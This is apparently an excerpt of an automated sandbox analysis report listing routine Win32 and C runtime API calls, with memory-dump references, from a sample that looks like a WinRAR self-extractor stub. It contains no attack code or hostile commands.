• Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_790000_file.jbxd
APIs
• ___free_lconv_mon.LIBCMT ref: 007B95D1
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9189
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B919B
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91AD
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91BF
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91D1
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91E3
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B91F5
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9207
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9219
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B922B
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B923D
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B924F
  • Part of subcall function 007B916C: _free.LIBCMT ref: 007B9261
• _free.LIBCMT ref: 007B95C6
  • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
  • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
• _free.LIBCMT ref: 007B95E8
• _free.LIBCMT ref: 007B95FD
• _free.LIBCMT ref: 007B9608
• _free.LIBCMT ref: 007B962A
• _free.LIBCMT ref: 007B963D
• _free.LIBCMT ref: 007B964B
• _free.LIBCMT ref: 007B9656
• _free.LIBCMT ref: 007B968E
• _free.LIBCMT ref: 007B9695
• _free.LIBCMT ref: 007B96B2
• _free.LIBCMT ref: 007B96CA
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
APIs
• GetWindow.USER32(?,00000005), ref: 007AB8DD
• GetClassNameW.USER32(00000000,?,00000800), ref: 007AB90C
  • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
• GetWindowLongW.USER32(00000000,000000F0), ref: 007AB92A
• SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 007AB941
• GetObjectW.GDI32(00000000,00000018,?), ref: 007AB954
  • Part of subcall function 007A8B22: GetDC.USER32(00000000), ref: 007A8B2E
  • Part of subcall function 007A8B22: GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A8B3D
  • Part of subcall function 007A8B22: ReleaseDC.USER32(00000000,00000000), ref: 007A8B4B
  • Part of subcall function 007A8ADF: GetDC.USER32(00000000), ref: 007A8AEB
  • Part of subcall function 007A8ADF: GetDeviceCaps.GDI32(00000000,00000058), ref: 007A8AFA
  • Part of subcall function 007A8ADF: ReleaseDC.USER32(00000000,00000000), ref: 007A8B08
• SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 007AB97B
• DeleteObject.GDI32(00000000), ref: 007AB982
• GetWindow.USER32(00000000,00000002), ref: 007AB98B
Similarity
• API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
• String ID: STATIC
• API String ID: 1444658586-1882779555
APIs
• _free.LIBCMT ref: 007B623F
  • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
  • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
• _free.LIBCMT ref: 007B624B
• _free.LIBCMT ref: 007B6256
• _free.LIBCMT ref: 007B6261
• _free.LIBCMT ref: 007B626C
• _free.LIBCMT ref: 007B6277
• _free.LIBCMT ref: 007B6282
• _free.LIBCMT ref: 007B628D
• _free.LIBCMT ref: 007B6298
• _free.LIBCMT ref: 007B62A6
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                                                                        • API String ID: 0-2277559157
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007A99AF
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 007A99DC
                                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 007A99F1
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 007A9A02
                                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 007A9A0B
                                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 007A9A1F
                                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 007A9A31
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                        • String ID: LICENSEDLG
                                                                                                                                        • API String ID: 3214253823-2177901306
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                                        • String ID: N,{$N,{$N,{
                                                                                                                                        • API String ID: 1036877536-4109897969
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00799232
                                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00799255
                                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00799274
                                                                                                                                          • Part of subcall function 007A0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0079AC49,?,?,?,0079ABF8,?,-00000002,?,00000000,?), ref: 007A0B28
                                                                                                                                        • _swprintf.LIBCMT ref: 00799310
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00799385
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 007993C1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                        • String ID: rtmp%d
                                                                                                                                        • API String ID: 2111052971-3303766350
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,?,007A8705,?), ref: 007A7FBA
                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000003,00000000,00000000), ref: 007A7FDB
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 007A8002
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocByteCharCreateMultiStreamWide
                                                                                                                                        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                        • API String ID: 4094277203-4209811716
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 007A7DAF
                                                                                                                                        • GetTickCount.KERNEL32 ref: 007A7DCD
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007A7DE3
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A7DF7
                                                                                                                                        • TranslateMessage.USER32(?), ref: 007A7E02
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 007A7E0D
                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000,?,?,?,?,00000000,00000000,00000000,<html>,00000006), ref: 007A7EBD
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 007A7EC7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$CountTickWindow$DispatchPeekShowTextTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4150546248-0
                                                                                                                                        APIs
                                                                                                                                        • __aulldiv.LIBCMT ref: 0079FE33
                                                                                                                                          • Part of subcall function 0079A8E0: GetVersionExW.KERNEL32(?), ref: 0079A905
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0079FE5C
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 0079FE6E
                                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0079FE7B
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0079FE91
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0079FE9D
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0079FED3
                                                                                                                                        • __aullrem.LIBCMT ref: 0079FF5D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1247370737-0
                                                                                                                                        APIs
                                                                                                                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007BCCE2,00000000,00000000,00000000,00000000,00000000,?), ref: 007BC5AF
                                                                                                                                        • __fassign.LIBCMT ref: 007BC62A
                                                                                                                                        • __fassign.LIBCMT ref: 007BC645
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007BC66B
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,007BCCE2,00000000,?,?,?,?,?,?,?,?,?,007BCCE2,00000000), ref: 007BC68A
                                                                                                                                        • WriteFile.KERNEL32(?,00000000,00000001,007BCCE2,00000000,?,?,?,?,?,?,?,?,?,007BCCE2,00000000), ref: 007BC6C3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1324828854-0
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 007AB0EF
                                                                                                                                        • _swprintf.LIBCMT ref: 007AB123
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,007D3122), ref: 007AB143
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 007AB176
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007AB257
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                                                        • String ID: %s%s%u
                                                                                                                                        • API String ID: 2892007947-1360425832
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                                                                        • String ID: %08x
                                                                                                                                        • API String ID: 1593746830-3682738293
                                                                                                                                        APIs
                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 007A85B5
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 007A85DA
                                                                                                                                        • ShowWindow.USER32(?,00000005,?), ref: 007A8671
                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 007A8679
                                                                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 007A868F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Show$RectText
                                                                                                                                        • String ID: RarHtmlClassName
                                                                                                                                        • API String ID: 3937224194-1658105358
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B92D3: _free.LIBCMT ref: 007B92FC
                                                                                                                                        • _free.LIBCMT ref: 007B935D
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B9368
                                                                                                                                        • _free.LIBCMT ref: 007B9373
                                                                                                                                        • _free.LIBCMT ref: 007B93C7
                                                                                                                                        • _free.LIBCMT ref: 007B93D2
                                                                                                                                        • _free.LIBCMT ref: 007B93DD
                                                                                                                                        • _free.LIBCMT ref: 007B93E8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,007B0C0B,007AE662), ref: 007B0C22
                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007B0C30
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007B0C49
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007B0C0B,007AE662), ref: 007B0C9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                        • API String ID: 0-1718035505
                                                                                                                                        APIs
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A00AE
                                                                                                                                          • Part of subcall function 0079A8E0: GetVersionExW.KERNEL32(?), ref: 0079A905
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007A00D0
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 007A00EA
                                                                                                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007A00FB
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A010B
                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 007A0117
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079FB07
                                                                                                                                        • EnterCriticalSection.KERNEL32(007D1E74,00000000,?,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF,?), ref: 0079FB15
                                                                                                                                        • new.LIBCMT ref: 0079FB35
                                                                                                                                        • new.LIBCMT ref: 0079FB6B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(007D1E74,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF,?,00008000,?), ref: 0079FB8B
                                                                                                                                        • LeaveCriticalSection.KERNEL32(007D1E74,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF,?,00008000,?), ref: 0079FB96
                                                                                                                                          • Part of subcall function 0079F930: InitializeCriticalSection.KERNEL32(000001A0,007D1E74,00000000,?,?,0079FB88,00000020,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?), ref: 0079F969
                                                                                                                                          • Part of subcall function 0079F930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F973
                                                                                                                                          • Part of subcall function 0079F930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F983
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3919453512-0
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,007CCBE8,007B2674,007CCBE8,?,?,007B2213,?,?,007CCBE8), ref: 007B6323
                                                                                                                                        • _free.LIBCMT ref: 007B6356
                                                                                                                                        • _free.LIBCMT ref: 007B637E
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B638B
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B6397
                                                                                                                                        • _abort.LIBCMT ref: 007B639D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                        APIs
                                                                                                                                        • CharUpperW.USER32(?,?,?,?,00001000), ref: 007AA92C
                                                                                                                                        • CharUpperW.USER32(?,?,?,?,?,00001000), ref: 007AA953
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharUpper
                                                                                                                                        • String ID: *a}$-
                                                                                                                                        • API String ID: 9403516-651630094
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007AB86B
                                                                                                                                        • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 007AB881
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 007AB89B
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000066), ref: 007AB8A6
                                                                                                                                        Strings
